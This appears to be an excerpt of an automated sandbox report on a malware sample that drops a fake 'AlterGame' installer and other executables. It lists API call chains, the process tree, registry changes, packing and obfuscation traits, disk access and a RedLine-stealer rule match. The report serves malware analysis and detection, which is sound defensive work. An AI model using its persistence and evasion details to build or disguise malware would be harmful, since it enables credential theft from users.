            Source: C:\Users\user\AppData\Local\AlterGame 1.13\altergame32.exeCode function: 6_2_02E4F0796_2_02E4F079
            Source: C:\Users\user\AppData\Local\AlterGame 1.13\altergame32.exeCode function: 6_2_02E64EE96_2_02E64EE9
            Source: C:\Users\user\AppData\Local\AlterGame 1.13\altergame32.exeCode function: 6_2_02E5E6656_2_02E5E665
            Source: C:\Users\user\AppData\Local\AlterGame 1.13\altergame32.exeCode function: 6_2_02E62E746_2_02E62E74
            Source: C:\Users\user\AppData\Local\AlterGame 1.13\altergame32.exeCode function: 6_2_02E59F446_2_02E59F44
            Source: C:\Users\user\AppData\Local\AlterGame 1.13\altergame32.exeCode function: 6_2_02E5ACFA6_2_02E5ACFA
            Source: C:\Users\user\AppData\Local\AlterGame 1.13\altergame32.exeCode function: 6_2_02E5DD596_2_02E5DD59
            Source: C:\Users\user\AppData\Local\AlterGame 1.13\altergame32.exeCode function: 6_2_02E585036_2_02E58503
            Source: C:\Users\user\AppData\Local\AlterGame 1.13\altergame32.exeCode function: 6_2_02E7BF806_2_02E7BF80
            Source: C:\Users\user\AppData\Local\AlterGame 1.13\altergame32.exeCode function: 6_2_02E7BF316_2_02E7BF31
            Source: C:\Users\user\AppData\Local\AlterGame 1.13\altergame32.exeCode function: 6_2_02E7B4E56_2_02E7B4E5
            Source: Joe Sandbox View Dropped File: C:\ProgramData\EShineEncoder\sqlite3.dll 16574F51785B0E2FC29C2C61477EB47BB39F714829999511DC8952B43AB17660
            Source: C:\Users\user\AppData\Local\Temp\is-JSG7N.tmp\NqISs1vOr.tmp Code function: String function: 0040595C appears 116 times
            Source: C:\Users\user\AppData\Local\Temp\is-JSG7N.tmp\NqISs1vOr.tmp Code function: String function: 00403400 appears 61 times
            Source: C:\Users\user\AppData\Local\Temp\is-JSG7N.tmp\NqISs1vOr.tmp Code function: String function: 00406AB4 appears 41 times
            Source: C:\Users\user\AppData\Local\Temp\is-JSG7N.tmp\NqISs1vOr.tmp Code function: String function: 00445DCC appears 45 times
            Source: C:\Users\user\AppData\Local\Temp\is-JSG7N.tmp\NqISs1vOr.tmp Code function: String function: 004344D4 appears 32 times
            Source: C:\Users\user\AppData\Local\Temp\is-JSG7N.tmp\NqISs1vOr.tmp Code function: String function: 0044609C appears 59 times
            Source: C:\Users\user\AppData\Local\Temp\is-JSG7N.tmp\NqISs1vOr.tmp Code function: String function: 00408BFC appears 45 times
            Source: C:\Users\user\AppData\Local\Temp\is-JSG7N.tmp\NqISs1vOr.tmp Code function: String function: 00457D3C appears 73 times
            Source: C:\Users\user\AppData\Local\Temp\is-JSG7N.tmp\NqISs1vOr.tmp Code function: String function: 00403494 appears 82 times
            Source: C:\Users\user\AppData\Local\Temp\is-JSG7N.tmp\NqISs1vOr.tmp Code function: String function: 004078E4 appears 42 times
            Source: C:\Users\user\AppData\Local\Temp\is-JSG7N.tmp\NqISs1vOr.tmp Code function: String function: 00453318 appears 93 times
            Source: C:\Users\user\AppData\Local\Temp\is-JSG7N.tmp\NqISs1vOr.tmp Code function: String function: 00457B30 appears 94 times
            Source: C:\Users\user\AppData\Local\Temp\is-JSG7N.tmp\NqISs1vOr.tmp Code function: String function: 00403684 appears 221 times
            Source: C:\Users\user\Desktop\file.exe Code function: String function: 0063B0C0 appears 34 times
            Source: C:\Users\user\AppData\Local\AlterGame 1.13\altergame32.exe Code function: String function: 02E58BA0 appears 37 times
            Source: C:\Users\user\AppData\Local\AlterGame 1.13\altergame32.exe Code function: String function: 02E653F0 appears 139 times
            Source: NqISs1vOr.exe.1.dr Static PE information: Resource name: RT_VERSION type: COM executable for DOS
            Source: ONE[1].file.1.dr Static PE information: Resource name: RT_VERSION type: COM executable for DOS
            Source: NqISs1vOr.tmp.2.dr Static PE information: Resource name: RT_RCDATA type: PE32+ executable (console) x86-64, for MS Windows
            Source: NqISs1vOr.tmp.2.dr Static PE information: Resource name: RT_RCDATA type: PE32 executable (DLL) (GUI) Intel 80386 (stripped to external PDB), for MS Windows
            Source: NqISs1vOr.tmp.2.dr Static PE information: Resource name: RT_VERSION type: 370 sysV pure executable not stripped
            Source: altergame32.exe.3.dr Static PE information: Resource name: RT_STRING type: DOS executable (COM, 0x8C-variant)
            Source: altergame32.exe.3.dr Static PE information: Resource name: RT_RCDATA type: Delphi compiled form 'TfcDlgArchiveVolumeRequest'
            Source: altergame32.exe.3.dr Static PE information: Resource name: RT_VERSION type: MIPSEB-LE ECOFF executable not stripped - version 0.79
            Source: is-CUGJK.tmp.3.dr Static PE information: Resource name: RT_RCDATA type: PE32+ executable (console) x86-64, for MS Windows
            Source: is-CUGJK.tmp.3.dr Static PE information: Resource name: RT_RCDATA type: PE32 executable (DLL) (GUI) Intel 80386 (stripped to external PDB), for MS Windows
            Source: is-CUGJK.tmp.3.dr Static PE information: Resource name: RT_VERSION type: 370 sysV pure executable not stripped
            Source: EShineEncoder.exe.6.dr Static PE information: Resource name: RT_STRING type: DOS executable (COM, 0x8C-variant)
            Source: EShineEncoder.exe.6.dr Static PE information: Resource name: RT_RCDATA type: Delphi compiled form 'TfcDlgArchiveVolumeRequest'
            Source: EShineEncoder.exe.6.dr Static PE information: Resource name: RT_VERSION type: MIPSEB-LE ECOFF executable not stripped - version 0.79
            Source: is-HKUEM.tmp.3.dr Static PE information: Number of sections : 19 > 10
            Source: sqlite3.dll.6.dr Static PE information: Number of sections : 19 > 10
            Source: file.exe Static PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, 32BIT_MACHINE
            Source: 00000000.00000002.1816811085.0000000000560000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_RedLineStealer_ed346e4c reference_sample = a91c1d3965f11509d1c1125210166b824a79650f29ea203983fffb5f8900858c, os = windows, severity = x86, creation_date = 2022-02-17, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 834c13b2e0497787e552bb1318664496d286e7cf57b4661e5e07bf1cffe61b82, id = ed346e4c-7890-41ee-8648-f512682fe20e, last_modified = 2022-04-12
            Source: classification engine Classification label: mal100.troj.evad.winEXE@16/40@1/3
            Source: C:\Users\user\AppData\Local\AlterGame 1.13\altergame32.exe Code function: 6_2_02E508C0 FormatMessageA,GetLastError,FormatMessageA,GetLastError
            Source: C:\Users\user\AppData\Roaming\0L1IPDf6p\NqISs1vOr.exe Code function: 2_2_00409448 GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,GetLastError,ExitWindowsEx
            Source: C:\Users\user\AppData\Local\Temp\is-JSG7N.tmp\NqISs1vOr.tmp Code function: 3_2_004555B8 GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,GetLastError,ExitWindowsEx
            Source: C:\Users\user\Desktop\file.exe Code function: 0_2_00404530 SetLastError,SetLastError,FindNextVolumeMountPointA,EnumTimeFormatsW,_calloc,__floor_pentium4,GetDllDirectoryW,OpenJobObjectA,InterlockedExchangeAdd,VirtualAlloc,GetLastError,GetDiskFreeSpaceExW,SetConsoleCP,GetSystemDefaultLCID,InterlockedExchange,GetDiskFreeSpaceExW,SetConsoleCP,GetSystemDefaultLCID,OutputDebugStringW,GetUserDefaultLangID,LoadLibraryW,ReadConsoleInputA,LCMapStringA,InterlockedIncrement,LCMapStringA,InterlockedIncrement,OpenEventW,GetCurrentProcess,GetCurrentProcess,GetLastError,GetFileAttributesA,GetShortPathNameW,SetComputerNameExA,GetFileAttributesA,GetShortPathNameW,SetComputerNameExA,FreeEnvironmentStringsW,GetComputerNameA,InterlockedExchange,LoadLibraryW
            Source: C:\Users\user\AppData\Local\AlterGame 1.13\altergame32.exe Code function: CreateServiceA,CloseServiceHandle,CloseServiceHandle, 6_2_00402B32
            Source: C:\Users\user\Desktop\file.exe Code function: 0_2_00568303 CreateToolhelp32Snapshot,Module32First
            Source: C:\Users\user\AppData\Local\Temp\is-JSG7N.tmp\NqISs1vOr.tmp Code function: 3_2_0046DF04 GetVersion,CoCreateInstance
            Source: C:\Users\user\AppData\Roaming\0L1IPDf6p\NqISs1vOr.exe Code function: 2_2_00409BEC FindResourceA,SizeofResource,LoadResource,LockResource
            Source: C:\Users\user\Desktop\file.exe File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\add[1].htm
            Source: C:\Users\user\AppData\Roaming\xMs8rtQRv7K\ebAAb6KfuCx7.exe Mutant created: NULL
            Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7076:120:WilError_03
            Source: C:\Users\user\AppData\Roaming\0L1IPDf6p\NqISs1vOr.exe File created: C:\Users\user\AppData\Local\Temp\is-JSG7N.tmp
            Source: C:\Users\user\Desktop\file.exe Command line argument: (LE/ 0_2_00404830
            Source: C:\Users\user\Desktop\file.exe Command line argument: [fA 0_2_00404830
            Source: C:\Users\user\Desktop\file.exe Command line argument: rU@ 0_2_00404830
            Source: C:\Users\user\Desktop\file.exe Command line argument: u{$ 0_2_00404830
            Source: C:\Users\user\Desktop\file.exe Command line argument: &YN9 0_2_00404830
            Source: C:\Users\user\Desktop\file.exe Command line argument: {X: 0_2_00404830
            Source: C:\Users\user\Desktop\file.exe Command line argument: Y~o 0_2_00404830
            Source: file.exe Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
            Source: C:\Users\user\AppData\Local\Temp\is-JSG7N.tmp\NqISs1vOr.tmp File read: C:\Windows\win.ini
            Source: C:\Users\user\Desktop\file.exe Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
            Source: C:\Users\user\AppData\Local\Temp\is-JSG7N.tmp\NqISs1vOr.tmp Key value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion RegisteredOrganization
            Source: C:\Users\user\AppData\Local\AlterGame 1.13\altergame32.exe File read: C:\Windows\System32\drivers\etc\hosts
            Source: altergame32.exe, altergame32.exe, 00000006.00000003.1933269475.00000000009C7000.00000004.00000020.00020000.00000000.sdmp, altergame32.exe, 00000006.00000002.3049470005.000000006096F000.00000002.00000001.01000000.0000000B.sdmp, is-HKUEM.tmp.3.dr, sqlite3.dll.6.dr Binary or memory string: SELECT 'INSERT INTO vacuum_db.' || quote(name) || ' SELECT * FROM main.' || quote(name) || ';' FROM vacuum_db.sqlite_master WHERE name=='sqlite_sequence';
            Source: altergame32.exe, 00000006.00000003.1933269475.00000000009C7000.00000004.00000020.00020000.00000000.sdmp, altergame32.exe, 00000006.00000002.3049470005.000000006096F000.00000002.00000001.01000000.0000000B.sdmp, is-HKUEM.tmp.3.dr, sqlite3.dll.6.dr Binary or memory string: INSERT INTO %Q.%s VALUES('index',%Q,%Q,#%d,%Q);
            Source: altergame32.exe, altergame32.exe, 00000006.00000003.1933269475.00000000009C7000.00000004.00000020.00020000.00000000.sdmp, altergame32.exe, 00000006.00000002.3049470005.000000006096F000.00000002.00000001.01000000.0000000B.sdmp, is-HKUEM.tmp.3.dr, sqlite3.dll.6.dr Binary or memory string: SELECT 'INSERT INTO vacuum_db.' || quote(name) || ' SELECT * FROM main.' || quote(name) || ';'FROM main.sqlite_master WHERE type = 'table' AND name!='sqlite_sequence' AND coalesce(rootpage,1)>0
            Source: altergame32.exe, 00000006.00000003.1933269475.00000000009C7000.00000004.00000020.00020000.00000000.sdmp, altergame32.exe, 00000006.00000002.3049470005.000000006096F000.00000002.00000001.01000000.0000000B.sdmp, is-HKUEM.tmp.3.dr, sqlite3.dll.6.dr Binary or memory string: CREATE TABLE "%w"."%w_node"(nodeno INTEGER PRIMARY KEY, data BLOB);CREATE TABLE "%w"."%w_rowid"(rowid INTEGER PRIMARY KEY, nodeno INTEGER);CREATE TABLE "%w"."%w_parent"(nodeno INTEGER PRIMARY KEY, parentnode INTEGER);INSERT INTO '%q'.'%q_node' VALUES(1, zeroblob(%d))
            Source: altergame32.exe, 00000006.00000003.1933269475.00000000009C7000.00000004.00000020.00020000.00000000.sdmp, altergame32.exe, 00000006.00000002.3049470005.000000006096F000.00000002.00000001.01000000.0000000B.sdmp, is-HKUEM.tmp.3.dr, sqlite3.dll.6.dr Binary or memory string: CREATE TABLE %Q.'%q_docsize'(docid INTEGER PRIMARY KEY, size BLOB);
            Source: altergame32.exe, 00000006.00000003.1933269475.00000000009C7000.00000004.00000020.00020000.00000000.sdmp, altergame32.exe, 00000006.00000002.3049470005.000000006096F000.00000002.00000001.01000000.0000000B.sdmp, is-HKUEM.tmp.3.dr, sqlite3.dll.6.dr Binary or memory string: CREATE TABLE IF NOT EXISTS %Q.'%q_stat'(id INTEGER PRIMARY KEY, value BLOB);
            Source: altergame32.exe, 00000006.00000003.1933269475.00000000009C7000.00000004.00000020.00020000.00000000.sdmp, altergame32.exe, 00000006.00000002.3049470005.000000006096F000.00000002.00000001.01000000.0000000B.sdmp, is-HKUEM.tmp.3.dr, sqlite3.dll.6.dr Binary or memory string: CREATE TABLE %Q.'%q_segdir'(level INTEGER,idx INTEGER,start_block INTEGER,leaves_end_block INTEGER,end_block INTEGER,root BLOB,PRIMARY KEY(level, idx));
            Source: altergame32.exe, 00000006.00000003.1933269475.00000000009C7000.00000004.00000020.00020000.00000000.sdmp, altergame32.exe, 00000006.00000002.3049470005.000000006096F000.00000002.00000001.01000000.0000000B.sdmp, is-HKUEM.tmp.3.dr, sqlite3.dll.6.dr Binary or memory string: UPDATE "%w".%s SET sql = sqlite_rename_parent(sql, %Q, %Q) WHERE %s;
            Source: altergame32.exe, 00000006.00000003.1933269475.00000000009C7000.00000004.00000020.00020000.00000000.sdmp, altergame32.exe, 00000006.00000002.3049470005.000000006096F000.00000002.00000001.01000000.0000000B.sdmp, is-HKUEM.tmp.3.dr, sqlite3.dll.6.dr Binary or memory string: UPDATE sqlite_temp_master SET sql = sqlite_rename_trigger(sql, %Q), tbl_name = %Q WHERE %s;
            Source: altergame32.exe, 00000006.00000003.1933269475.00000000009C7000.00000004.00000020.00020000.00000000.sdmp, altergame32.exe, 00000006.00000002.3049470005.000000006096F000.00000002.00000001.01000000.0000000B.sdmp, is-HKUEM.tmp.3.dr, sqlite3.dll.6.dr Binary or memory string: CREATE TABLE %Q.'%q_segments'(blockid INTEGER PRIMARY KEY, block BLOB);
            Source: altergame32.exe, 00000006.00000003.1933269475.00000000009C7000.00000004.00000020.00020000.00000000.sdmp, altergame32.exe, 00000006.00000002.3049470005.000000006096F000.00000002.00000001.01000000.0000000B.sdmp, is-HKUEM.tmp.3.dr, sqlite3.dll.6.dr Binary or memory string: UPDATE %Q.%s SET sql = CASE WHEN type = 'trigger' THEN sqlite_rename_trigger(sql, %Q)ELSE sqlite_rename_table(sql, %Q) END, tbl_name = %Q, name = CASE WHEN type='table' THEN %Q WHEN name LIKE 'sqlite_autoindex%%' AND type='index' THEN 'sqlite_autoindex_' || %Q || substr(name,%d+18) ELSE name END WHERE tbl_name=%Q COLLATE nocase AND (type='table' OR type='index' OR type='trigger');
            Source: altergame32.exe, altergame32.exe, 00000006.00000003.1933269475.00000000009C7000.00000004.00000020.00020000.00000000.sdmp, altergame32.exe, 00000006.00000002.3049470005.000000006096F000.00000002.00000001.01000000.0000000B.sdmp, is-HKUEM.tmp.3.dr, sqlite3.dll.6.dr Binary or memory string: SELECT 'DELETE FROM vacuum_db.' || quote(name) || ';' FROM vacuum_db.sqlite_master WHERE name='sqlite_sequence'
            Source: file.exe ReversingLabs: Detection: 36%
            Source: file.exe Virustotal: Detection: 39%
            Source: unknown Process created: C:\Users\user\Desktop\file.exe "C:\Users\user\Desktop\file.exe"
            Source: C:\Users\user\Desktop\file.exe Process created: C:\Users\user\Desktop\file.exe "C:\Users\user\Desktop\file.exe"
            Source: C:\Users\user\Desktop\file.exe Process created: C:\Users\user\AppData\Roaming\0L1IPDf6p\NqISs1vOr.exe "C:\Users\user\AppData\Roaming\0L1IPDf6p\NqISs1vOr.exe"
            Source: C:\Users\user\AppData\Roaming\0L1IPDf6p\NqISs1vOr.exe Process created: C:\Users\user\AppData\Local\Temp\is-JSG7N.tmp\NqISs1vOr.tmp "C:\Users\user\AppData\Local\Temp\is-JSG7N.tmp\NqISs1vOr.tmp" /SL5="$403E6,3817417,54272,C:\Users\user\AppData\Roaming\0L1IPDf6p\NqISs1vOr.exe"
            Source: C:\Users\user\AppData\Local\Temp\is-JSG7N.tmp\NqISs1vOr.tmp Process created: C:\Windows\SysWOW64\net.exe "C:\Windows\system32\net.exe" pause alter_game_11196
            Source: C:\Windows\SysWOW64\net.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
            Source: C:\Users\user\AppData\Local\Temp\is-JSG7N.tmp\NqISs1vOr.tmp Process created: C:\Users\user\AppData\Local\AlterGame 1.13\altergame32.exe "C:\Users\user\AppData\Local\AlterGame 1.13\altergame32.exe" -i
            Source: C:\Windows\SysWOW64\net.exe Process created: C:\Windows\SysWOW64\net1.exe C:\Windows\system32\net1 pause alter_game_11196
            Source: C:\Users\user\Desktop\file.exe Process created: C:\Users\user\AppData\Roaming\xMs8rtQRv7K\ebAAb6KfuCx7.exe "C:\Users\user\AppData\Roaming\xMs8rtQRv7K\ebAAb6KfuCx7.exe"
            Source: C:\Users\user\Desktop\file.exe Section loaded: apphelp.dll, msimg32.dll, uxtheme.dll, wininet.dll, iertutil.dll, sspicli.dll, windows.storage.dll, wldp.dll, profapi.dll, kernel.appcore.dll, ondemandconnroutehelper.dll, winhttp.dll, mswsock.dll, iphlpapi.dll, winnsi.dll, urlmon.dll, srvcli.dll, netutils.dll, cryptsp.dll, rsaenh.dll, cryptbase.dll
            Source: C:\Users\user\AppData\Roaming\0L1IPDf6p\NqISs1vOr.exe Section loaded: apphelp.dll, uxtheme.dll
            Source: C:\Users\user\AppData\Local\Temp\is-JSG7N.tmp\NqISs1vOr.tmp Section loaded: apphelp.dll, mpr.dll, version.dll, uxtheme.dll, kernel.appcore.dll, textinputframework.dll, coreuicomponents.dll, coremessaging.dll, ntmarta.dll, wintypes.dll, shfolder.dll, rstrtmgr.dll, ncrypt.dll, ntasn1.dll, msacm32.dll, winmmbase.dll, textshaping.dll, windows.storage.dll, wldp.dll, riched20.dll, usp10.dll, msls31.dll, sspicli.dll, explorerframe.dll, sfc.dll, sfc_os.dll
            Source: C:\Windows\SysWOW64\net.exe Section loaded: mpr.dll, wkscli.dll, netutils.dll, samcli.dll, srvcli.dll, iphlpapi.dll
            Source: C:\Users\user\AppData\Local\AlterGame 1.13\altergame32.exe Section loaded: apphelp.dll, sqlite3.dll, version.dll, appxsip.dll, opcservices.dll, iphlpapi.dll, dhcpcsvc.dll, ntmarta.dll, wininet.dll, dnsapi.dll, windows.storage.dll, wldp.dll, profapi.dll, cryptbase.dll, mswsock.dll, iertutil.dll, sspicli.dll, kernel.appcore.dll, ondemandconnroutehelper.dll, winhttp.dll, winnsi.dll, urlmon.dll, srvcli.dll, netutils.dll
            Source: C:\Windows\SysWOW64\net1.exe Section loaded: samcli.dll, netutils.dll, dsrole.dll, srvcli.dll, wkscli.dll
            Source: C:\Windows\SysWOW64\net1.exeSection loaded: logoncli.dllJump to behavior
            Source: C:\Windows\SysWOW64\net1.exeSection loaded: cryptbase.dllJump to behavior
            Source: C:\Users\user\AppData\Roaming\xMs8rtQRv7K\ebAAb6KfuCx7.exeSection loaded: mscoree.dllJump to behavior
            Source: C:\Users\user\AppData\Roaming\xMs8rtQRv7K\ebAAb6KfuCx7.exeSection loaded: apphelp.dllJump to behavior
            Source: C:\Users\user\AppData\Roaming\xMs8rtQRv7K\ebAAb6KfuCx7.exeSection loaded: kernel.appcore.dllJump to behavior
            Source: C:\Users\user\AppData\Roaming\xMs8rtQRv7K\ebAAb6KfuCx7.exeSection loaded: version.dllJump to behavior
            Source: C:\Users\user\AppData\Roaming\xMs8rtQRv7K\ebAAb6KfuCx7.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
            Source: C:\Users\user\AppData\Roaming\xMs8rtQRv7K\ebAAb6KfuCx7.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
            Source: C:\Users\user\Desktop\file.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{057EEE47-2572-4AA1-88D7-60CE2149E33C}\InProcServer32Jump to behavior
            Source: C:\Users\user\AppData\Local\Temp\is-JSG7N.tmp\NqISs1vOr.tmpKey value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion RegisteredOwnerJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\is-JSG7N.tmp\NqISs1vOr.tmpWindow found: window name: TMainFormJump to behavior
            Source: Window RecorderWindow detected: More than 3 window changes detected
            Source: C:\Users\user\AppData\Local\Temp\is-JSG7N.tmp\NqISs1vOr.tmpRegistry value created: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\AlterGame_is1Jump to behavior
            Source: Binary string: msvcp71.pdbx# source: is-PR9GR.tmp.3.dr
            Source: Binary string: msvcr71.pdb< source: is-GSS65.tmp.3.dr
            Source: Binary string: msvcp71.pdb source: is-PR9GR.tmp.3.dr
            Source: Binary string: MicrosoftWindowsGdiPlus-1.0.2600.1360-gdiplus.pdb source: is-28G11.tmp.3.dr
            Source: Binary string: C:\Users\79631\source\repos\Gcleanerapp\Gcleanerapp\obj\Release\Gcleanerapp.pdb source: ebAAb6KfuCx7.exe, 00000008.00000000.1932852369.00000000008F2000.00000002.00000001.01000000.0000000C.sdmp, PAB1[1].file.1.dr, ebAAb6KfuCx7.exe.1.dr
            Source: Binary string: msvcr71.pdb source: is-GSS65.tmp.3.dr

            Data Obfuscation

            Source: C:\Users\user\AppData\Local\AlterGame 1.13\altergame32.exeUnpacked PE file: 6.2.altergame32.exe.400000.0.unpack _qrsa_4:ER;_qrsb_4:R;_qrsc_4:W;.rsrc:R;_qrsd_4:EW; vs .text:ER;.rdata:R;.data:W;.vmp0:ER;.rsrc:R;
            Source: C:\Users\user\AppData\Local\AlterGame 1.13\altergame32.exeUnpacked PE file: 6.2.altergame32.exe.400000.0.unpack
            Source: ebAAb6KfuCx7.exe.1.drStatic PE information: 0xDEC807D9 [Wed Jun 9 20:26:01 2088 UTC]
            Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0040C415 LoadLibraryA,GetProcAddress,GetProcAddress,__encode_pointer,GetProcAddress,__encode_pointer,GetProcAddress,__encode_pointer,GetProcAddress,__encode_pointer,GetProcAddress,__encode_pointer,__decode_pointer,__decode_pointer,__decode_pointer,__decode_pointer,__decode_pointer,0_2_0040C415
            Source: initial sampleStatic PE information: section where entry point is pointing to: _qrsa_4
            Source: file.exeStatic PE information: section name: .wujep
            Source: file.exeStatic PE information: section name: .jin
            Source: altergame32.exe.3.drStatic PE information: section name: _qrsa_4
            Source: altergame32.exe.3.drStatic PE information: section name: _qrsb_4
            Source: altergame32.exe.3.drStatic PE information: section name: _qrsc_4
            Source: altergame32.exe.3.drStatic PE information: section name: _qrsd_4
            Source: is-28G11.tmp.3.drStatic PE information: section name: Shared
            Source: is-HKUEM.tmp.3.drStatic PE information: section name: /4
            Source: is-HKUEM.tmp.3.drStatic PE information: section name: /19
            Source: is-HKUEM.tmp.3.drStatic PE information: section name: /35
            Source: is-HKUEM.tmp.3.drStatic PE information: section name: /51
            Source: is-HKUEM.tmp.3.drStatic PE information: section name: /63
            Source: is-HKUEM.tmp.3.drStatic PE information: section name: /77
            Source: is-HKUEM.tmp.3.drStatic PE information: section name: /89
            Source: is-HKUEM.tmp.3.drStatic PE information: section name: /102
            Source: is-HKUEM.tmp.3.drStatic PE information: section name: /113
            Source: is-HKUEM.tmp.3.drStatic PE information: section name: /124
            Source: sqlite3.dll.6.drStatic PE information: section name: /4
            Source: sqlite3.dll.6.drStatic PE information: section name: /19
            Source: sqlite3.dll.6.drStatic PE information: section name: /35
            Source: sqlite3.dll.6.drStatic PE information: section name: /51
            Source: sqlite3.dll.6.drStatic PE information: section name: /63
            Source: sqlite3.dll.6.drStatic PE information: section name: /77
            Source: sqlite3.dll.6.drStatic PE information: section name: /89
            Source: sqlite3.dll.6.drStatic PE information: section name: /102
            Source: sqlite3.dll.6.drStatic PE information: section name: /113
            Source: sqlite3.dll.6.drStatic PE information: section name: /124
            Source: EShineEncoder.exe.6.drStatic PE information: section name: _qrsa_4
            Source: EShineEncoder.exe.6.drStatic PE information: section name: _qrsb_4
            Source: EShineEncoder.exe.6.drStatic PE information: section name: _qrsc_4
            Source: EShineEncoder.exe.6.drStatic PE information: section name: _qrsd_4
            Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00406795 push ecx; ret 0_2_004067A8
            Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0056A0AF push esi; retf 0_2_0056A0BA
            Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0056B165 push edi; retf 0_2_0056B166
            Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0056B187 push esi; retf 0_2_0056B188
            Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0056B6FE pushad ; ret 0_2_0056B6FF
            Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0056D34D push ds; ret 0_2_0056D358
            Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0056A3B4 push ebx; iretd 0_2_0056A3B7
            Source: C:\Users\user\Desktop\file.exeCode function: 0_2_006470D6 push esp; retf 0_2_006470D7
            Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0063397B push dword ptr [edi+03h]; retf 0_2_00633981
            Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00646AD8 push esp; retf 0_2_00646AE0
            Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0063AB57 push ecx; ret 0_2_0063AB6A
            Source: C:\Users\user\AppData\Roaming\0L1IPDf6p\NqISs1vOr.exeCode function: 2_2_004065B8 push 004065F5h; ret 2_2_004065ED
            Source: C:\Users\user\AppData\Roaming\0L1IPDf6p\NqISs1vOr.exeCode function: 2_2_004040B5 push eax; ret 2_2_004040F1
            Source: C:\Users\user\AppData\Roaming\0L1IPDf6p\NqISs1vOr.exeCode function: 2_2_00408104 push ecx; mov dword ptr [esp], eax2_2_00408109
            Source: C:\Users\user\AppData\Roaming\0L1IPDf6p\NqISs1vOr.exeCode function: 2_2_00404185 push 00404391h; ret 2_2_00404389
            Source: C:\Users\user\AppData\Roaming\0L1IPDf6p\NqISs1vOr.exeCode function: 2_2_00404206 push 00404391h; ret 2_2_00404389
            Source: C:\Users\user\AppData\Roaming\0L1IPDf6p\NqISs1vOr.exeCode function: 2_2_0040C218 push eax; ret 2_2_0040C219
            Source: C:\Users\user\AppData\Roaming\0L1IPDf6p\NqISs1vOr.exeCode function: 2_2_004042E8 push 00404391h; ret 2_2_00404389
            Source: C:\Users\user\AppData\Roaming\0L1IPDf6p\NqISs1vOr.exeCode function: 2_2_00404283 push 00404391h; ret 2_2_00404389
            Source: C:\Users\user\AppData\Roaming\0L1IPDf6p\NqISs1vOr.exeCode function: 2_2_00408F38 push 00408F6Bh; ret 2_2_00408F63
            Source: C:\Users\user\AppData\Local\Temp\is-JSG7N.tmp\NqISs1vOr.tmpCode function: 3_2_0040993C push 00409979h; ret 3_2_00409971
            Source: C:\Users\user\AppData\Local\Temp\is-JSG7N.tmp\NqISs1vOr.tmpCode function: 3_2_0040A037 push ds; ret 3_2_0040A038
            Source: C:\Users\user\AppData\Local\Temp\is-JSG7N.tmp\NqISs1vOr.tmpCode function: 3_2_004941B8 push ecx; mov dword ptr [esp], ecx3_2_004941BD
            Source: C:\Users\user\AppData\Local\Temp\is-JSG7N.tmp\NqISs1vOr.tmpCode function: 3_2_004062B4 push ecx; mov dword ptr [esp], eax3_2_004062B5
            Source: C:\Users\user\AppData\Local\Temp\is-JSG7N.tmp\NqISs1vOr.tmpCode function: 3_2_004106C8 push ecx; mov dword ptr [esp], edx3_2_004106CD
            Source: C:\Users\user\AppData\Local\Temp\is-JSG7N.tmp\NqISs1vOr.tmpCode function: 3_2_00412920 push 00412983h; ret 3_2_0041297B
            Source: C:\Users\user\AppData\Local\Temp\is-JSG7N.tmp\NqISs1vOr.tmpCode function: 3_2_00484BE8 push ecx; mov dword ptr [esp], ecx3_2_00484BED
            Source: C:\Users\user\AppData\Local\Temp\is-JSG7N.tmp\NqISs1vOr.tmpCode function: 3_2_0040D020 push ecx; mov dword ptr [esp], edx3_2_0040D022
            Source: C:\Users\user\AppData\Local\Temp\is-JSG7N.tmp\NqISs1vOr.tmpCode function: 3_2_004590F0 push 00459134h; ret 3_2_0045912C
            Source: C:\Users\user\AppData\Local\Temp\is-JSG7N.tmp\NqISs1vOr.tmpCode function: 3_2_0040546D push eax; ret 3_2_004054A9
            Source: C:\Users\user\AppData\Local\Temp\is-JSG7N.tmp\NqISs1vOr.tmpCode function: 3_2_00443438 push ecx; mov dword ptr [esp], ecx3_2_0044343C
            Source: altergame32.exe.3.drStatic PE information: section name: _qrsa_4 entropy: 7.633010281787107
            Source: EShineEncoder.exe.6.drStatic PE information: section name: _qrsa_4 entropy: 7.633010281787107

            Persistence and Installation Behavior

            Source: C:\Users\user\AppData\Local\AlterGame 1.13\altergame32.exeCode function: CreateFileA,DeviceIoControl,GetLastError,CloseHandle, \\.\PhysicalDrive06_2_00401A4F
            Source: C:\Users\user\AppData\Local\AlterGame 1.13\altergame32.exeCode function: CreateFileA,DeviceIoControl,GetLastError,CloseHandle, \\.\PhysicalDrive06_2_02E4F8A2
